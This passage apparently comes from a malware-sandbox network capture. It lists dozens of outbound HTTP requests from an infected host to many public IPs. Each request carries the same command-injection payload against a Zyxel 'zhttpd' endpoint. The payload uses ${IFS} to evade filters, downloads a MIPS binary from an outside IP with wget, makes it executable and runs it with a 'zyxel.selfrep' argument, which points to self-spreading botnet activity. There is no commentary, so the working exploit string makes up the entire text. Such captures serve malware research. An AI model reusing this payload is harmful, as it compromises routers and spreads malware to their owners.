                                            Jan 14, 2024 15:50:26.198992968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            678192.168.2.234477090.36.70.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.199018955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            679192.168.2.2343980221.156.32.165443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.199050903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            680192.168.2.2338130191.10.47.75443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.199081898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            681192.168.2.234172098.2.70.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.199131012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            682192.168.2.2339770220.44.208.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.199136019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            683192.168.2.235608087.30.175.110443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.199163914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            684192.168.2.233752248.150.209.6443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.199189901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            685192.168.2.2355310182.176.242.216443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.199214935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            686192.168.2.235327440.100.9.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.199232101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            687192.168.2.2333012169.215.105.42443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.199230909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            688192.168.2.2342636207.150.97.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.199255943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            689192.168.2.2359760201.65.152.101443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.199337959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            690192.168.2.2332800122.178.151.165443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.199343920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            691192.168.2.236019417.130.66.191443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.199350119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            692192.168.2.2345826204.210.41.98443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.199400902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            693192.168.2.235498277.190.42.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.199455976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            694192.168.2.233292647.244.213.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.199465990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            695192.168.2.2343188150.196.189.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.199515104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            696192.168.2.2337346181.53.193.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.199534893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            697192.168.2.233331890.128.6.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.199577093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            698192.168.2.233994297.79.97.54443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.199599981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            699192.168.2.235736870.163.209.179443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.199624062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            700192.168.2.2338328201.129.174.179443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.199667931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            701192.168.2.2335046172.251.107.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.199681997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            702192.168.2.2348028206.21.80.129443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.199721098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            703192.168.2.2337000211.222.5.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.199737072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            704192.168.2.235857699.228.50.8443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.199781895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            705192.168.2.2352702221.174.165.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.199812889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            706192.168.2.2341894111.153.29.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.199841976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            707192.168.2.235579232.8.241.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.199883938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            708192.168.2.2344608223.226.168.53443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.199898005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            709192.168.2.234778866.63.87.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.199909925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            710192.168.2.234718631.1.76.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.199942112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            711192.168.2.2342684126.92.64.253443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.199992895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            712192.168.2.234023451.59.13.107443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.200016022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            713192.168.2.2359118160.191.145.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.200068951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            714192.168.2.2347870197.209.212.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.200068951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            715192.168.2.233528640.144.212.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.200097084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            716192.168.2.235854698.121.206.159443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.200117111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            717192.168.2.2343654109.67.219.155443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.200141907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            718192.168.2.2343686143.204.56.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.200171947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            719192.168.2.2345868196.111.122.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.200176954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            720192.168.2.2357240157.73.209.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.200218916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            721192.168.2.234227020.163.90.251443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.200258970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            722192.168.2.233459090.184.96.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.200275898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            723192.168.2.2342486205.188.4.189443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.200304985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            724192.168.2.233321019.118.51.84443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.200356007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            725192.168.2.2351908121.62.187.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.200364113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            726192.168.2.23385842.220.208.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.200408936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            727192.168.2.2357194113.170.224.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.200424910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            728192.168.2.234975084.190.183.42443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.200460911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            729192.168.2.2333752188.93.113.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.200495958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            730192.168.2.235075699.59.219.103443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.200524092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            731192.168.2.2333764168.201.243.72443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.200556993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            732192.168.2.2349918154.252.116.87443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.200596094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            733192.168.2.2354792163.68.188.203443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.200598955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            734192.168.2.235347861.120.174.9443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.200645924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            735192.168.2.2357110223.142.175.117443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.200668097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            736192.168.2.234920861.79.138.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.200700045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            737192.168.2.234702253.223.122.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.200740099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            738192.168.2.2351846111.87.109.26443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.200782061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            739192.168.2.235160660.167.151.24443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:26.200793982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            740192.168.2.235766469.117.9.186443
                                            TimestampBytes transferredDirectionData
